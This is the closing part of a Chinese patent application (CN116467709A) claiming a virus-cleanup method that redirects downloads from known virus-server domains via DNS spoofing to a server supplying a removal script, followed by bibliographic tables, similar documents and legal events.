最后,还需要说明的是,在本文中,诸如第一和第二等之类的关系术语仅仅用来将一个实体或者操作与另一个实体或操作区分开来,而不一定要求或者暗示这些实体或操作之间存在任何这种实际的关系或者顺序。而且,术语“包括”、“包含”或者其任何其他变体意在涵盖非排他性的包含,从而使得包括一系列要素的过程、方法、物品或者设备不仅包括那些要素,而且还包括没有明确列出的其他要素,或者是还包括为这种过程、方法、物品或者设备所固有的要素。在没有更多限制的情况下,由语句“包括一个……”限定的要素,并不排除在包括所述要素的过程、方法、物品或者设备中还存在另外的相同要素。
对所公开的实施例的上述说明,使本领域技术人员能够实现或使用本申请。对这些实施例的多种修改对本领域的技术人员来说将是显而易见的,本文中所定义的一般原理可以在不脱离本申请的精神或范围的情况下,在其它实施例中实现。因此,本申请将不会被限制于本文所示的这些实施例,而是要符合与本文所公开的原理和新颖特点相一致的最宽的范围。
Claims (10)
1.一种计算机病毒清理方法,其特征在于,应用于计算机,包括:
当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,所述目标服务器中存储有病毒清除脚本;
执行域名解析后的所述脚本下载任务,从所述目标服务器下载所述病毒清除脚本;
运行所述病毒清除脚本。
2.根据权利要求1所述的方法,其特征在于,从所述目标服务器下载的所述病毒清除脚本的文件格式与所述脚本下载任务的病毒文件的文件格式相同。
3.根据权利要求1所述的方法,其特征在于,所述将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,包括:
通过入侵检测系统的DNS伪装代理响应功能,对所述脚本下载任务的服务器域名进行DNS解析,得到解析结果;
所述解析结果标识所述脚本下载任务的服务器域名为所述预设的目标服务器的IP地址。
4.一种计算机病毒清理方法,其特征在于,应用于目标服务器,所述目标服务器存储有病毒清除脚本,包括:
获得计算机发送的脚本下载请求,所述脚本下载请求为计算机向所述目标服务器的IP地址发送的脚本下载请求;所述目标服务器的IP地址通过对脚本下载任务的服务器域名的解析获得,其中,所述脚本下载任务的服务器域名为病毒服务器域名;
将所述病毒清除脚本发送至所述计算机。
5.根据权利要求4所述的方法,其特征在于,所述病毒清除脚本的文件格式与所述脚本下载任务的病毒文件的文件格式相同。
6.一种计算机病毒清理系统,其特征在于,包括:计算机、目标服务器;
所述计算机,用于当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,并向所述目标服务器发送脚本下载请求;所述目标服务器中存储有病毒清除脚本;
所述目标服务器,用于将所述病毒清除脚本发送至计算机;
所述计算机,还用于下载并运行所述病毒清除脚本。
7.一种计算机病毒清理装置,其特征在于,包括:
第一单元,用于当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,所述目标服务器中存储有病毒清除脚本;
第二单元,用于执行域名解析后的所述脚本下载任务,从所述目标服务器下载所述病毒清除脚本;
第三单元,用于运行所述病毒清除脚本。
8.一种计算机病毒清理装置,其特征在于,应用于目标服务器,所述目标服务器存储有病毒清除脚本,包括:
第四单元,用于获得计算机发送的脚本下载请求,所述脚本下载请求为计算机向所述目标服务器的IP地址发送的脚本下载请求;所述目标服务器的IP地址通过对脚本下载任务的服务器域名的解析获得,其中,所述脚本下载任务的服务器域名为病毒服务器域名;
第五单元,用于将所述病毒清除脚本发送至所述计算机。
9.一种电子设备,其特征在于,包括:
处理器;
用于存储所述处理器可执行指令的存储器;
所述处理器,用于通过运行所述存储器中的指令,执行上述权利要求1-5任意一项所述的计算机病毒清理方法。
10.一种计算机存储介质,其特征在于,所述存储介质存储有计算机程序,所述计算机程序被处理器运行时,执行上述权利要求1-5中任意一项所述的计算机病毒清理方法。
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202310275344.2A CN116467709A (zh) | 2023-03-16 | 2023-03-16 | 一种计算机病毒清理方法、系统、装置及电子设备 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202310275344.2A CN116467709A (zh) | 2023-03-16 | 2023-03-16 | 一种计算机病毒清理方法、系统、装置及电子设备 |
Publications (1)
Publication Number | Publication Date |
---|---|
CN116467709A true CN116467709A (zh) | 2023-07-21 |
Family
ID=87176234
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202310275344.2A Pending CN116467709A (zh) | 2023-03-16 | 2023-03-16 | 一种计算机病毒清理方法、系统、装置及电子设备 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN116467709A (zh) |
-
2023
- 2023-03-16 CN CN202310275344.2A patent/CN116467709A/zh active Pending
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US10666686B1 (en) | Virtualized exploit detection system | |
US10872151B1 (en) | System and method for triggering analysis of an object for malware in response to modification of that object | |
US10354072B2 (en) | System and method for detection of malicious hypertext transfer protocol chains | |
US10552610B1 (en) | Adaptive virtual machine snapshot update framework for malware behavioral analysis | |
US10225280B2 (en) | System and method for verifying and detecting malware | |
US11824878B2 (en) | Malware detection at endpoint devices | |
US9910981B2 (en) | Malicious code infection cause-and-effect analysis | |
US8959624B2 (en) | Executable download tracking system | |
KR20130140952A (ko) | 악성 코드 차단 시스템 | |
US8799450B2 (en) | Server-based system, method, and computer program product for scanning data on a client using only a subset of the data | |
JP2022067092A (ja) | サイバーセキュリティ保護システムおよび関連する事前対応型の不審ドメイン警告システム | |
US10360379B2 (en) | Method and apparatus for detecting exploits | |
US10757118B2 (en) | Method of aiding the detection of infection of a terminal by malware | |
CN114785621B (zh) | 漏洞检测方法、装置、电子设备及计算机可读存储介质 | |
CN116467709A (zh) | 一种计算机病毒清理方法、系统、装置及电子设备 | |
JP6635029B2 (ja) | 情報処理装置、情報処理システム及び通信履歴解析方法 | |
JP2022067091A (ja) | サイバーセキュリティ保護システムおよび関連する事前対応型の不審ドメイン警告システム | |
TWI764618B (zh) | 網路資安威脅防護系統及相關的前攝性可疑網域示警系統 | |
JP6900328B2 (ja) | 攻撃種別判定装置、攻撃種別判定方法、及びプログラム | |
JP2015082191A (ja) | 情報処理装置、情報処理方法 | |
JP2023177332A (ja) | コンピュータ又はコンピュータネットワークにおける脅威検出の構成及び方法 |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination |